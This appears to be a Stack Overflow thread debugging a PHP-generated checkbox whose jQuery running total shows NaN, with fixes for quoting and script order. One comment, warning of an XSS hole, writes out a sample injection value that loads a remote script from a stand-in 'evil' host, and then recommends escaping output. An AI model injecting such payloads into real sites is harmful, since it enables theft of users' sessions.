# JavaScript returning 'Nan" on checkbox total?

Tags: javascript, jquery

**HTML/PHP:**

```
echo "<input type='checkbox' id='chk_esitmate' onchange='calculate_estimate(this);' 
name='" . $row['id'] ." value=". ($row['value'] ? $row['value']: '0') .
"'/>";
```

so each one looks like:

```
<input type='checkbox' id='chk_estimate' onchange='calculate_estimate(this);' name = '14' value=40/>
```

**JavaScript:**

```
var estimate = 0;

function calculate_estimate(elem)
                    {
                        var value = parseInt(elem.value, 10);
                        var status = jQuery('#span_estimate');  
                        if (elem.checked)
                        {   
                        window.estimate += value;
                        status.html(window.estimate);
                        }
                        else {
                        window.estimate -= value;
                        status.html(window.estimate);   
                        }
                    }
```

However everytime I click a checkbox it returns NaN (Not a number). Does anyone know where I am going wrong? I have used parseInt

Comment: Didn't vote down, but why are you using inline events if you're using jquery?

Comment: If the first character cannot be converted to a number, parseInt() returns NaN.

Comment: Also, your code [works fine for me](http://jsfiddle.net/7AxWc/).  Did you perchance copy this php code from somewhere?

Comment: Yes, I copied it from the code I wrote and pasted it here...

Comment: No, I mean did you copy any part of the code you wrote from a website?

Comment: No, I used `window.estimate` and `parseInt` after reading on stack otherwise i wrote the code myself. Even using the generated html by php in the actual page works using jfiddle...so stumped

Comment: The html you have given us is not generated by the php, given the php is bugged.

Comment: Also you have a glaring XSS bug here... what if `$row['value']` contains: `'><script src="http://example.com/evil.js"></script>`. You need to wrap stuff going from DB to HTML in `htmlspecialchars($data, ENT_QUOTES, 'UTF-8')`. (I make a function: `function html($data){ return htmlspecialchars($data, ENT_QUOTES, 'UTF-8'); }` so I just need to call `value='" . html($data) . "'`). Very important as through XSS hackers can steal session IDs etc.

Answer (score 1):

Works for me here - http://jsfiddle.net/atif089/NyA4H/

Make sure `calculate_estimate` is defined in header and not in footer.

Answer (score 0):

Since you are using jQuery already, why won't you do it like this:

```
var estimate = 0;

$('#chk_estimate').click(function() {

    var value = $(this).val();

    // do your stuff in here

});
```

Answer (score 0):

you can use javascript to know whether check box is checked or not

```
if(document.getElementById('chk_estimate').checked==true)
{
var num=document.getElementById('chk_estimate').value;
        alert(num);  
}
```

Comment: c.c this doesn't even address the question.

Answer (score 0):

Given I don't have direct access to your files, this answer is mostly shooting in the dark, but it comes from past experience.  As said by @SubirKumarSao, parseInt will throw NaN if the first character it encounters cannot be converted to a number.  This leads me to believe that you copied a hidden character from another website.. this is most commonly the case when dealing with these sorts of errors, though of course the character could also be present in your `$row` array.  Aside from that...

```
echo "<input type='checkbox' id='chk_esitmate' onchange='calculate_estimate(this);' 
name='" . $row['id'] ." value=". ($row['value'] ? $row['value']: '0') .
// missing quote here  ^ and ^ here
"'/>";
```

This line is bugged; you forgot single quote marks after the closing double quote mark, and before the opening double quote mark, I've left a comment to indicate where the missing single quotes should be.

What the line should look like:

```
echo "<input type='checkbox' id='chk_esitmate' onchange='calculate_estimate(this);' name='" . $row['id'] ."' value='". ($row['value'] ? $row['value']: '0') ."'/>";
```

Comment: Look mate, there isn't any hidden characters. The html generated by the code is: `<input type="checkbox" id="chk_esitmate" onchange="calculate_estimate(this);" name="12" value="38">`, exactly as it appears on the site after making the quotation edits

Comment: @StephenH I'm sorry, but I'm trying to debug here with limited information.  Hidden characters seem the only probable cause here, as the code works fine otherwise.  Please just bear with me; save the generated html content of your test page/website, and then with a code editor like notpad++, highlight the `="38"`.  Assuming the editor you are using calculates selected characters, it should of course read 5 if everything is as it should be.

Answer (score 0):

Well, I've solved the problem and it was an error that I don't understand.

I have javscript functions on the page: `calculate_estimate` and `calculate_remaining`.

I set the global variable `var estimate = 0;`

at the very top of the script, I then placed the `calculate_remaining` function below that and then below that is the `calculate_estimate` function.

I don't know why that would effect it as the first function does not use the `estimate variable`

Sorry to have wasted your time, thanks for the help